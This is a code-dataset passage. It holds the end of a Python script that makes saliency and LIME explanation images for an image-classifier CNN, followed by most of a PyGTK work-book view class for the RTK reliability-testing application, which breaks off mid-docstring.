pad=0.05)\n plt.savefig('rep/test'+str(i)+'.jpg')\n plt.close()\n else:\n im = plt.imshow(saliency[i], cmap=plt.cm.jet)\n plt.colorbar(im)\n\n plt.savefig(os.path.join(sys.argv[2], 'fig1_'+str(i)+'.jpg'))\n plt.close()\n\ndef compute_saliency_maps(x, y, model):\n model.eval()\n x.requires_grad_()\n y_pred = model(x.cuda())\n loss_func = torch.nn.CrossEntropyLoss()\n loss = loss_func(y_pred, y.cuda())\n loss.backward()\n\n saliency = x.grad.abs().squeeze().data\n return saliency\ndef explain(instance, predict_fn, **kwargs):\n np.random.seed(16)\n return exp.explain_instance(instance, predict_fn, **kwargs)\n\ndef predict(img):\n img = color.rgb2gray(img)\n img = img.reshape(img.shape[0], 1, 48, 48)\n t_img = torch.tensor(img).type(torch.FloatTensor).cuda()\n return model(t_img).detach().cpu().numpy()\n\ndef segmentation(img):\n return slic(img)\n\ndef gray2rgb(imgs):\n numData = imgs.shape[0]\n tmp = imgs.reshape(numData, 48,48)\n return color.gray2rgb(tmp)\n\ndef classify(imgs, label):\n img_list = [[] for i in range(7)]\n y_list = [[] for i in range(7)]\n for i in range(len(imgs)):\n y_list[label[i]].append(label[i])\n img_list[label[i]].append(imgs[i])\n num_pick = min([len(i) for i in img_list])\n num_pick = min(num_pick, 10)\n print('num_pick: ',num_pick)\n img = np.array(np.array(img_list[0][0:num_pick]) )\n lab = np.array(np.array(y_list[0][0:num_pick]) )\n for i in range(1, 7):\n img = np.concatenate((img, np.array(img_list[i][0:num_pick])), axis=0)\n lab = np.concatenate((lab, np.array(y_list[i][0:num_pick])), axis=0)\n return img, lab\n\nif __name__ == \"__main__\":\n try:\n imgs = np.load('imgs.npy')\n label = np.load('label.npy')\n except:\n imgs, label = parse_csv(sys.argv[1])\n np.save('imgs.npy', imgs)\n np.save('label.npy', label)\n try:\n imgs = np.load('cimgs.npy')\n label = np.load('clabel.npy')\n except:\n imgs, label = classify(imgs, label)\n np.save('cimgs.npy', imgs)\n np.save('clabel.npy', label)\n \n imgs_tensor = torch.tensor(imgs).type(torch.FloatTensor)\n label_tensor = torch.tensor(label).type(torch.LongTensor)\n model = Model.MyCNN()\n model.load_state_dict(torch.load('model_params0.6896.pkl'))\n model.cuda()\n model.eval()\n print(label_tensor)\n s_imgs = np.concatenate((imgs[2:3],imgs[12:13],imgs[22:23],imgs[37:38]\\\n ,imgs[45:46],imgs[52:53],imgs[65:66]), axis=0)\n s_imgs_tensor = torch.tensor(s_imgs).type(torch.FloatTensor)\n s_label_tensor = torch.tensor(np.arange(7)).type(torch.LongTensor)\n show_saliency_maps(s_imgs_tensor, s_label_tensor, model)\n \n # Lime needs RGB images\n \n lime_imgs = np.concatenate((imgs[5:6],imgs[18:19],imgs[23:24],imgs[30:31]\\\n ,imgs[41:42],imgs[52:53],imgs[60:61]), axis=0)\n \n x_train_rgb = gray2rgb(lime_imgs)\n # Initiate explainer instance\n \n explainer = lime_image.LimeImageExplainer()\n for idx in range(len(x_train_rgb)):\n # Get the explaination of an image\n np.random.seed(16)\n explaination = explainer.explain_instance(image=x_train_rgb[idx], \n classifier_fn=predict,segmentation_fn=segmentation)\n\n # Get processed image\n label = np.arange(7)\n image, mask = explaination.get_image_and_mask(label=label[idx],positive_only=False,\n hide_rest=False,num_features=5,min_weight=0.0)\n # save the image\n plt.imsave(os.path.join(sys.argv[2], 'fig3_'+str(idx)+'.jpg') ,image)","sub_path":"hw4/explainAI.py","file_name":"explainAI.py","file_ext":"py","file_size_in_byte":5772,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"83570902","text":"#!/usr/bin/env python\r\n\"\"\"\r\n##############################\r\nTesting Package Work Book View\r\n##############################\r\n\"\"\"\r\n\r\n# -*- coding: utf-8 -*-\r\n#\r\n# rtk.testing.WorkBook.py is part of The RTK Project\r\n#\r\n# All rights reserved.\r\n\r\nimport sys\r\n\r\n# Import modules for localization support.\r\nimport gettext\r\nimport locale\r\n\r\n# Modules required for the GUI.\r\ntry:\r\n import pygtk\r\n pygtk.require('2.0')\r\nexcept ImportError:\r\n sys.exit(1)\r\ntry:\r\n import gtk\r\nexcept ImportError:\r\n sys.exit(1)\r\ntry:\r\n import gtk.glade\r\nexcept ImportError:\r\n sys.exit(1)\r\n\r\n# Import other RTK modules.\r\ntry:\r\n import Configuration\r\n import gui.gtk.Widgets as Widgets\r\nexcept ImportError:\r\n import rtk.Configuration as Configuration\r\n import rtk.gui.gtk.Widgets as Widgets\r\n# from Assistants import AddTesting\r\nimport __gui.gtk.Growth as gGrowth\r\n\r\n__author__ = 'Andrew Rowland'\r\n__email__ = 'andrew.rowland@reliaqual.com'\r\n__organization__ = 'ReliaQual Associates, LLC'\r\n__copyright__ = 'Copyright 2007 - 2015 Andrew \"Weibullguy\" Rowland'\r\n\r\ntry:\r\n locale.setlocale(locale.LC_ALL, Configuration.LOCALE)\r\nexcept locale.Error:\r\n locale.setlocale(locale.LC_ALL, '')\r\n\r\n_ = gettext.gettext\r\n\r\n\r\nclass WorkView(gtk.VBox): # pylint: disable=R0902, R0904\r\n \"\"\"\r\n The Work Book view displays all the attributes for the selected\r\n Testing item. The attributes of a Work Book view are:\r\n\r\n :ivar _workview: the RTK top level Work View window to embed the\r\n Testing Work Book into.\r\n :ivar _testing_model: the Testing data model whose attributes are being\r\n displayed.\r\n :ivar dict _dic_definitions: dictionary containing pointers to the failure\r\n definitions for the Revision being displayed.\r\n Key is the Failure Definition ID; value is the\r\n pointer to the Failure Definition data model.\r\n :ivar list _lst_handler_id: list containing the ID's of the callback\r\n signals for each gtk.Widget() associated with\r\n an editable Testing attribute.\r\n\r\n +----------+-------------------------------------------+\r\n | Position | Widget - Signal |\r\n +==========+===========================================+\r\n | 0 | txtName `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 1 | txtPartNum `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 2 | txtAltPartNum `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 3 | cmbCategory `changed` |\r\n +----------+-------------------------------------------+\r\n | 4 | cmbSubcategory `changed` |\r\n +----------+-------------------------------------------+\r\n | 5 | txtRefDes `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 6 | txtCompRefDes `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 7 | txtQuantity `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 8 | txtDescription `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 9 | cmbManufacturer `changed` |\r\n +----------+-------------------------------------------+\r\n | 10 | txtCAGECode `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 11 | txtLCN `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 12 | txtNSN `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 13 | txtYearMade `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 14 | txtSpecification `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 15 | txtPageNum `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 16 | txtFigNum `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 17 | txtAttachments `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 18 | txtMissionTime `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n | 19 | chkRepairable `toggled` |\r\n +----------+-------------------------------------------+\r\n | 20 | chkTagged `toggled` |\r\n +----------+-------------------------------------------+\r\n | 21 | txtRemarks `focus_out_event` |\r\n +----------+-------------------------------------------+\r\n\r\n :ivar dtcTesting: the :class:`rtk.testing.Testing.Testing` data\r\n controller to use with this Work Book.\r\n\r\n :ivar chkSafetyCritical: the :class:`gtk.CheckButton` to display/edit the\r\n Testing's safety criticality.\r\n\r\n :ivar txtName: the :class:`gtk.Entry` to display/edit the Testing name.\r\n :ivar txtTotalCost: the :class:`gtk.Entry` to display the Testing cost.\r\n :ivar txtPartCount: the :class:`gtk.Entry` to display the number of\r\n Components comprising the Assembly.\r\n :ivar txtRemarks: the :class:`gtk.Entry` to display/edit the Testing\r\n remarks.\r\n :ivar txtPredictedHt: the :class:`gtk.Entry` to display the Testing\r\n logistics hazard rate.\r\n :ivar txtMissionHt: the :class:`gtk.Entry` to display the Testing mission\r\n hazard rate.\r\n :ivar txtMTBF: the :class:`gtk.Entry` to display the Testing logistics\r\n MTBF.\r\n :ivar txtMissionMTBF: the :class:`gtk.Entry` to display the Testing\r\n mission MTBF.\r\n :ivar txtMPMT: the :class:`gtk.Entry` to display the Testing mean\r\n preventive maintenance time.\r\n :ivar txtMCMT: the :class:`gtk.Entry` to display the Testing mean\r\n corrective maintenance time.\r\n :ivar txtMTTR: the :class:`gtk.Entry` to display the Testing mean time to\r\n repair.\r\n :ivar txtMMT: the :class:`gtk.Entry` to display the Testing mean\r\n maintenance time.\r\n :ivar txtAvailability: the :class:`gtk.Entry` to display the Testing\r\n logistics availability.\r\n :ivar txtMissionAt: the :class:`gtk.Entry` to display the Testing mission\r\n availability.\r\n \"\"\"\r\n\r\n def __init__(self, modulebook):\r\n \"\"\"\r\n Method to initialize the Work Book view for the Testing package.\r\n\r\n :param modulebook: the :py:class:`rtk.testing.ModuleBook` to associate\r\n with this Work Book.\r\n \"\"\"\r\n\r\n gtk.VBox.__init__(self)\r\n\r\n # Define private dictionary attributes.\r\n\r\n # Define private list attributes.\r\n self._lst_handler_id = []\r\n\r\n # Define private scalar attributes.\r\n self._modulebook = modulebook\r\n self._mdcRTK = modulebook.mdcRTK\r\n self._testing_model = None\r\n self._obj_planning = None\r\n self._obj_feasibility = None\r\n self._obj_assessment = None\r\n\r\n # Define public dictionary attributes.\r\n\r\n # Define public list attributes.\r\n\r\n # Define public scalar attributes.\r\n\r\n # General Data page widgets.\r\n self.cmbTestType = Widgets.make_combo(simple=True)\r\n\r\n self.spnConfidence = gtk.SpinButton()\r\n self.spnConsumerRisk = gtk.SpinButton()\r\n self.spnProducerRisk = gtk.SpinButton()\r\n\r\n self.txtName = Widgets.make_entry(width=400)\r\n self.txtAttachment = Widgets.make_text_view(width=400)\r\n self.txtDescription = Widgets.make_text_view(width=400)\r\n self.txtCumTime = Widgets.make_entry(width=100, editable=False,\r\n bold=True)\r\n self.txtCumFails = Widgets.make_entry(width=100, editable=False,\r\n bold=True)\r\n\r\n # Configure the gtk.SpinButtons.\r\n _adjustment = gtk.Adjustment(75.0, 50.0, 100.0, 0.5, 0, 0)\r\n self.spnConfidence.set_adjustment(_adjustment)\r\n self.spnConfidence.set_digits(int(Configuration.PLACES))\r\n\r\n self.spnConsumerRisk.set_digits(int(Configuration.PLACES))\r\n self.spnConsumerRisk.set_increments(0.1, 1.0)\r\n self.spnConsumerRisk.set_range(0.0, 100.0)\r\n\r\n self.spnProducerRisk.set_digits(int(Configuration.PLACES))\r\n self.spnProducerRisk.set_increments(0.1, 1.0)\r\n self.spnProducerRisk.set_range(0.0, 100.0)\r\n\r\n # Set gtk.Widget() tooltip text.\r\n self.cmbTestType.set_tooltip_text(_(u\"Select the type of the \"\r\n u\"of the selected test.\"))\r\n self.spnConfidence.set_tooltip_text(_(u\"Sets the statistical \"\r\n u\"confidence for results \"\r\n u\"obtained from the selected \"\r\n u\"test.\"))\r\n self.spnConsumerRisk.set_tooltip_text(_(u\"The consumer (Type I) \"\r\n u\"risk. This is the risk of \"\r\n u\"accepting a system when the \"\r\n u\"true reliability is below \"\r\n u\"the technical requirement.\"))\r\n self.spnProducerRisk.set_tooltip_text(_(u\"The producer (Type II) \"\r\n u\"risk. This is the risk of \"\r\n u\"rejecting a system when the \"\r\n u\"true reliability is at \"\r\n u\"least the goal \"\r\n u\"reliability.\"))\r\n self.txtAttachment.set_tooltip_text(_(u\"Enter the URL to any \"\r\n u\"attachment associated with \"\r\n u\"the selected test.\"))\r\n self.txtCumFails.set_tooltip_text(_(u\"Displays the cumulative number \"\r\n u\"of failures for the selected \"\r\n u\"test.\"))\r\n self.txtCumTime.set_tooltip_text(_(u\"Displays the cumulative test \"\r\n u\"time for the selected test.\"))\r\n self.txtDescription.set_tooltip_text(_(u\"Enter a description of \"\r\n u\"the selected test.\"))\r\n self.txtName.set_tooltip_text(_(u\"Enter the name of the selected \"\r\n u\"test.\"))\r\n\r\n # Connect gtk.Widget() signals to callback methods.\r\n _textview = self.txtDescription.get_child().get_child()\r\n self._lst_handler_id.append(\r\n _textview.connect('focus-out-event', self._on_focus_out, 0))\r\n self._lst_handler_id.append(\r\n self.txtName.connect('focus-out-event', self._on_focus_out, 1))\r\n self._lst_handler_id.append(\r\n self.txtAttachment.connect('focus-out-event',\r\n self._on_focus_out, 2))\r\n\r\n self._lst_handler_id.append(\r\n self.cmbTestType.connect('changed', self._on_combo_changed, 3))\r\n self._lst_handler_id.append(\r\n self.spnConfidence.connect('value-changed',\r\n self._on_value_changed, 4))\r\n self._lst_handler_id.append(\r\n self.spnConsumerRisk.connect('value-changed',\r\n self._on_value_changed, 5))\r\n self._lst_handler_id.append(\r\n self.spnProducerRisk.connect('value-changed',\r\n self._on_value_changed, 6))\r\n\r\n # Put it all together.\r\n _toolbar = self._create_toolbar()\r\n self.pack_start(_toolbar, expand=False)\r\n\r\n _notebook = self._create_notebook()\r\n self.pack_end(_notebook)\r\n\r\n self.show_all()\r\n\r\n def _create_toolbar(self):\r\n \"\"\"\r\n Method to create the toolbar for the Testing class Work Book.\r\n\r\n :return: _toolbar\r\n :rtype: gtk.Toolbar\r\n \"\"\"\r\n\r\n _toolbar = gtk.Toolbar()\r\n\r\n _position = 0\r\n\r\n # Add test button.\r\n _button = gtk.ToolButton()\r\n _button.set_tooltip_text(_(u\"Adds a new test.\"))\r\n _image = gtk.Image()\r\n _image.set_from_file(Configuration.ICON_DIR + '32x32/add.png')\r\n _button.set_icon_widget(_image)\r\n _button.connect('clicked', self._on_button_clicked, 0)\r\n _toolbar.insert(_button, 0)\r\n _position += 1\r\n\r\n # Delete test button\r\n _button = gtk.ToolButton()\r\n _button.set_tooltip_text(_(u\"Removes the currently selected test from \"\r\n u\"from the RTK Program Database.\"))\r\n _image = gtk.Image()\r\n _image.set_from_file(Configuration.ICON_DIR + '32x32/remove.png')\r\n _button.set_icon_widget(_image)\r\n _button.connect('clicked', self._on_button_clicked, 1)\r\n _toolbar.insert(_button, _position)\r\n _position += 1\r\n\r\n _toolbar.insert(gtk.SeparatorToolItem(), _position)\r\n _position += 1\r\n\r\n # Save all tests button\r\n _button = gtk.ToolButton()\r\n _image = gtk.Image()\r\n _image.set_from_file(Configuration.ICON_DIR + '32x32/save.png')\r\n _button.set_icon_widget(_image)\r\n _button.connect('clicked', self._on_button_clicked, 2)\r\n _toolbar.insert(_button, _position)\r\n _position += 1\r\n\r\n _toolbar.insert(gtk.SeparatorToolItem(), _position)\r\n\r\n _toolbar.show()\r\n\r\n return _toolbar\r\n\r\n def _create_notebook(self):\r\n \"\"\"\r\n Method to create the Testing class gtk.Notebook().\r\n\r\n :return: _notebook\r\n :rtype: gtk.Notebook\r\n \"\"\"\r\n\r\n _notebook = gtk.Notebook()\r\n\r\n # Set the user's preferred gtk.Notebook() tab position.\r\n if Configuration.TABPOS[2] == 'left':\r\n _notebook.set_tab_pos(gtk.POS_LEFT)\r\n elif Configuration.TABPOS[2] == 'right':\r\n _notebook.set_tab_pos(gtk.POS_RIGHT)\r\n elif Configuration.TABPOS[2] == 'top':\r\n _notebook.set_tab_pos(gtk.POS_TOP)\r\n else:\r\n _notebook.set_tab_pos(gtk.POS_BOTTOM)\r\n\r\n self._create_general_data_page(_notebook)\r\n\r\n return _notebook\r\n\r\n def _create_general_data_page(self, notebook):\r\n \"\"\"\r\n Method to create the Testing class gtk.Notebook() page for\r\n displaying general data about the selected Testing.\r\n\r\n :param gtk.Notebook notebook: the Testing class gtk.Notebook() widget.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: boolean\r\n \"\"\"\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Build-up the containers for the tab. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n _fixed = gtk.Fixed()\r\n\r\n _scrollwindow = gtk.ScrolledWindow()\r\n _scrollwindow.set_policy(gtk.POLICY_AUTOMATIC,\r\n gtk.POLICY_AUTOMATIC)\r\n _scrollwindow.add_with_viewport(_fixed)\r\n\r\n _frame = Widgets.make_frame(label=_(u\"General Information\"))\r\n _frame.set_shadow_type(gtk.SHADOW_ETCHED_OUT)\r\n _frame.add(_scrollwindow)\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Place the widgets used to display general information. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the gtk.ComboBox()\r\n _test_types = [_(u\"HALT/HASS\"), _(u\"ALT\"), _(u\"ESS\"),\r\n _(u\"Reliability Growth\"),\r\n _(u\"Reliability Demonstration\"), _(u\"PRAT\")]\r\n _model = self.cmbTestType.get_model()\r\n _model.clear()\r\n self.cmbTestType.append_text(\"\")\r\n for __, _types in enumerate(_test_types):\r\n self.cmbTestType.append_text(_types)\r\n\r\n # Create the labels.\r\n _labels = [_(u\"Test Name:\"), _(u\"Test Description:\"),\r\n _(u\"Test Type:\"), _(u\"Confidence:\"), _(u\"Consumer's Risk:\"),\r\n _(u\"Producer's Risk:\"), _(u\"Cumulative Time:\"),\r\n _(u\"Cumulative Failures:\"), _(u\"Attachments:\")]\r\n\r\n (_x_pos, _y_pos) = Widgets.make_labels(_labels[:2], _fixed, 5, 5)\r\n (_x_pos1, _y_pos1) = Widgets.make_labels(_labels[2:], _fixed, 5,\r\n _y_pos[1] + 105)\r\n _x_pos = max(_x_pos, _x_pos1) + 25\r\n\r\n # Place the widgets.\r\n _fixed.put(self.txtName, _x_pos, _y_pos[0])\r\n _fixed.put(self.txtDescription, _x_pos, _y_pos[1])\r\n _fixed.put(self.cmbTestType, _x_pos, _y_pos1[0])\r\n _fixed.put(self.spnConfidence, _x_pos, _y_pos1[1])\r\n _fixed.put(self.spnConsumerRisk, _x_pos, _y_pos1[2])\r\n _fixed.put(self.spnProducerRisk, _x_pos, _y_pos1[3])\r\n _fixed.put(self.txtCumTime, _x_pos, _y_pos1[4])\r\n _fixed.put(self.txtCumFails, _x_pos, _y_pos1[5])\r\n _fixed.put(self.txtAttachment, _x_pos, _y_pos1[6])\r\n\r\n _fixed.show_all()\r\n\r\n # Insert the tab.\r\n _label = gtk.Label()\r\n _label.set_markup(\"\" +\r\n _(u\"General\\nData\") +\r\n \"\")\r\n _label.set_alignment(xalign=0.5, yalign=0.5)\r\n _label.set_justify(gtk.JUSTIFY_CENTER)\r\n _label.show_all()\r\n _label.set_tooltip_text(_(u\"Displays general information about \"\r\n u\"the selected test.\"))\r\n notebook.insert_page(_frame, tab_label=_label, position=-1)\r\n\r\n return False\r\n\r\n def _load_planning_inputs_page(self): # pylint: disable=R0914, R0915\r\n \"\"\"\r\n Method to create and load the Testing class gtk.Notebook() page for\r\n displaying the test planning inputs for the selected Test.\r\n\r\n :param gtk.Notebook notebook: the Testing class gtk.Notebook() widget.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: boolean\r\n \"\"\"\r\n\r\n _notebook = self.get_children()[1]\r\n\r\n self._obj_planning = gGrowth.Planning(self._mdcRTK.dtcGrowth,\r\n self._modulebook.listbook)\r\n self._obj_planning.create_page()\r\n self._obj_planning.load_page(self._testing_model)\r\n self._obj_planning.show_all()\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Build-up the containers for the tab. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n _label = gtk.Label()\r\n _label.set_markup(\"\" +\r\n _(u\"Test\\nPlanning\\nInputs\") + \"\")\r\n _label.set_alignment(xalign=0.5, yalign=0.5)\r\n _label.set_justify(gtk.JUSTIFY_CENTER)\r\n _label.show_all()\r\n _label.set_tooltip_text(_(u\"Allows entering test planning inputs for \"\r\n u\"the selected test.\"))\r\n\r\n _notebook.insert_page(self._obj_planning, tab_label=_label,\r\n position=-1)\r\n\r\n return False\r\n\r\n def _load_feasibility_page(self): # pylint: disable=R0914, R0915\r\n \"\"\"\r\n Method to create and load the Testing class gtk.Notebook() page for\r\n displaying the test feasibility assessment for the selected Test.\r\n\r\n :param gtk.Notebook notebook: the Testing class gtk.Notebook() widget.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: boolean\r\n \"\"\"\r\n\r\n _notebook = self.get_children()[1]\r\n\r\n self._obj_feasibility = gGrowth.Feasibility(self._mdcRTK.dtcGrowth,\r\n self._modulebook.listbook)\r\n self._obj_feasibility.create_page()\r\n self._obj_feasibility.load_page(self._testing_model)\r\n self._obj_feasibility.show_all()\r\n\r\n _label = gtk.Label()\r\n _label.set_markup(\"\" +\r\n _(u\"Test\\nFeasibility\") + \"\")\r\n _label.set_alignment(xalign=0.5, yalign=0.5)\r\n _label.set_justify(gtk.JUSTIFY_CENTER)\r\n _label.show_all()\r\n _label.set_tooltip_text(_(u\"Displays the feasibility criteria for the \"\r\n u\"selected test.\"))\r\n\r\n _notebook.insert_page(self._obj_feasibility, tab_label=_label,\r\n position=-1)\r\n\r\n return False\r\n\r\n def _load_assessment_page(self): # pylint: disable=R0914, R0915\r\n \"\"\"\r\n Method to create and load the Test Assessment gtk.Notebook() page for\r\n displaying the test results for the selected Test.\r\n\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n _notebook = self.get_children()[1]\r\n\r\n self._obj_assessment = gGrowth.Assessment(self._mdcRTK.dtcGrowth,\r\n self._modulebook.listbook)\r\n self._obj_assessment.create_page()\r\n self._obj_assessment.load_page(self._testing_model)\r\n self._obj_assessment.show_all()\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Build-up the containers for the tab. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n _label = gtk.Label()\r\n _label.set_markup(\"\" +\r\n _(u\"Test\\nResults\") + \"\")\r\n _label.set_alignment(xalign=0.5, yalign=0.5)\r\n _label.set_justify(gtk.JUSTIFY_CENTER)\r\n _label.show_all()\r\n _label.set_tooltip_text(_(u\"Displays the test results for the \"\r\n u\"selected test.\"))\r\n\r\n _notebook.insert_page(self._obj_assessment, tab_label=_label,\r\n position=-1)\r\n\r\n return False\r\n\r\n def load(self, model):\r\n \"\"\"\r\n Method to load the Testing class gtk.Notebook().\r\n\r\n :param model: the :py:class:`rtk.testing.Testing.Model` to load.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: boolean\r\n \"\"\"\r\n\r\n self._testing_model = model\r\n\r\n fmt = '{0:0.' + str(Configuration.PLACES) + 'g}'\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the General Data information. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n self.cmbTestType.set_active(model.test_type)\r\n self.spnConfidence.set_value(float(model.confidence * 100.0))\r\n self.spnConsumerRisk.set_value(float(model.consumer_risk))\r\n self.spnProducerRisk.set_value(float(model.producer_risk))\r\n self.txtName.set_text(str(model.name))\r\n _textview = self.txtAttachment.get_children()[0].get_children()[0].get_buffer()\r\n _textview.set_text(model.attachment)\r\n _textview = self.txtDescription.get_children()[0].get_children()[0].get_buffer()\r\n _textview.set_text(model.description)\r\n self.txtCumTime.set_text(str(fmt.format(model.cum_time)))\r\n self.txtCumFails.set_text(str(fmt.format(model.cum_failures)))\r\n\r\n _notebook = self.get_children()[1]\r\n for _page in range(_notebook.get_n_pages() - 1):\r\n _notebook.remove_page(-1)\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the Planning Data information. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n self._load_planning_inputs_page()\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the Feasibility Data information. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n self._load_feasibility_page()\r\n\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n # Load the Assessment Data information. #\r\n # +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ #\r\n self._load_assessment_page()\r\n\r\n _notebook.set_current_page(0)\r\n\r\n return False\r\n\r\n def _request_add_testing(self, test_type, model, parent, testing_id):\r\n \"\"\"\r\n Method to call the Testing data controller function 'add_test' and\r\n then update the Testing Work Book gtk.TreeView() with the newly added\r\n test.\r\n\r\n :param int test_type: the type of Testing item to add.\r\n * 1 = HALT/HASS\r\n * 2 = ALT\r\n * 3 = ESS\r\n * 4 = Reliability Growth\r\n * 5 = Reliability Demonstration\r\n * 6 = PRAT\r\n :param gtk.TreeModel model: the gtk.TreeModel() displaying the Testing\r\n hierarchy.\r\n :param gtk.TreeIter parent: the gtk.TreeIter() that will be the parent\r\n of the newly added testing item.\r\n :param int testing_id: the testing ID of the parent Testing module.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n # Add the new testing item to the database and dtcTesting dictionary.\r\n (_testing, _error_code) = self._mdcRTK.dtcTesting.add_testing(\r\n self._testing_model.revision_id, test_type, testing_id)\r\n\r\n if test_type == 1:\r\n _icon = Configuration.ICON_DIR + '32x32/halthass.png'\r\n elif test_type == 2:\r\n _icon = Configuration.ICON_DIR + '32x32/accelerated.png'\r\n elif test_type == 3:\r\n _icon = Configuration.ICON_DIR + '32x32/ess.png'\r\n elif test_type == 4:\r\n _icon = Configuration.ICON_DIR + '32x32/growth.png'\r\n elif test_type == 5:\r\n _icon = Configuration.ICON_DIR + '32x32/demonstration.png'\r\n elif test_type == 6:\r\n _icon = Configuration.ICON_DIR + '32x32/prat.png'\r\n\r\n # Update the module book view to show the new test.\r\n _icon = gtk.gdk.pixbuf_new_from_file_at_size(_icon, 22, 22)\r\n _data = list(_testing.get_attributes()) + [_icon]\r\n\r\n model.append(parent, _data)\r\n self._modulebook.treeview.expand_all()\r\n\r\n return False\r\n\r\n def _request_delete_testing(self):\r\n \"\"\"\r\n Method to call the BoM data controller function 'delete_testing' and\r\n then update the Testing Work Book gtk.TreeView() with the newly added\r\n testing item.\r\n\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n # Find the selected testing item.\r\n _selection = self._modulebook.treeview.get_selection()\r\n (_model, _row) = _selection.get_selected()\r\n\r\n # Delete the selected testing item from the database and the\r\n # Testing data controller dictionary.\r\n self._mdcRTK.dtcTesting.delete_testing(self._testing_model.testing_id)\r\n\r\n # Refresh the Testing gtkTreeView().\r\n if _row is not None:\r\n _path = _model.get_path(_row)\r\n _model.remove(_row)\r\n _selection.select_path(_path)\r\n\r\n return False\r\n\r\n def _on_button_clicked(self, __button, index):\r\n \"\"\"\r\n Method to respond to gtk.Button() 'clicked' signals and call the\r\n correct function or method, passing any parameters as needed.\r\n\r\n :param gtk.Button __button: the gtk.Button() that called this method.\r\n :param int index: the index in the handler ID list of the callback\r\n signal associated with the gtk.Button() that called\r\n this method.\r\n :return: False if successful or True if an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n# WARNING: Refactor _on_button_clicked; current McCabe Complexity metric = 11.\r\n if index == 0:\r\n if self._testing_model.test_type == 4:\r\n self._mdcRTK.dtcGrowth.add_test(self._testing_model.test_id)\r\n elif index == 1:\r\n if self._testing_model.test_type == 4:\r\n self._mdcRTK.dtcGrowth.delete_test(self._testing_model.test_id)\r\n elif index == 2:\r\n if self._testing_model.test_type == 4:\r\n self._mdcRTK.dtcGrowth.save_all_tests()\r\n\r\n return False\r\n\r\n def _on_combo_changed(self, combo, index):\r\n \"\"\"\r\n Method to respond to gtk.ComboBox() 'changed' signals and call the\r\n correct function or method, passing any parameters as needed.\r\n\r\n :param gtk.ComboBox combo: the gtk.ComboBox() that called this method.\r\n :param int index: the index in the handler ID list oc the callback\r\n signal associated with the gtk.ComboBox() that\r\n called this method.\r\n :return: False if successful or True is an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n combo.handler_block(self._lst_handler_id[index])\r\n\r\n if index == 3: # Test type\r\n self._testing_model.test_type = combo.get_active()\r\n self._modulebook.update(5, self._testing_model.test_type)\r\n\r\n combo.handler_unblock(self._lst_handler_id[index])\r\n\r\n return False\r\n\r\n def _on_focus_out(self, entry, __event, index): # pylint: disable=R0912\r\n \"\"\"\r\n Method to respond to gtk.Entry() 'focus_out' signals and call the\r\n correct function or method, passing any parameters as needed.\r\n\r\n :param gtk.Entry entry: the gtk.Entry() that called this method.\r\n :param gtk.gdk.Event __event: the gtk.gdk.Event() that called this\r\n method.\r\n :param int index: the index in the handler ID list of the callback\r\n signal associated with the gtk.Entry() that\r\n called this method.\r\n :return: False if successful or True is an error is encountered.\r\n :rtype: bool\r\n \"\"\"\r\n\r\n entry.handler_block(self._lst_handler_id[index])\r\n\r\n if index == 0:\r\n _textbuffer = entry.get_buffer()\r\n _description = _textbuffer.get_text(*_textbuffer.get_bounds())\r\n self._testing_model.description = _description\r\n self._modulebook.update(4, self._testing_model.description)\r\n elif index == 1:\r\n self._testing_model.name = entry.get_text()\r\n self._modulebook.update(3, self._testing_model.name)\r\n elif index == 2:\r\n self._testing_model.attachment = entry.get_text()\r\n self._modulebook.update(6, self._testing_model.attachment)\r\n\r\n entry.handler_unblock(self._lst_handler_id[index])\r\n\r\n return False\r\n\r\n def _on_value_changed(self, button, index): # pylint: disable=R0912\r\n \"\"\"\r\n Method to respond to gtk.SpinButton() 'value_changed' signals and 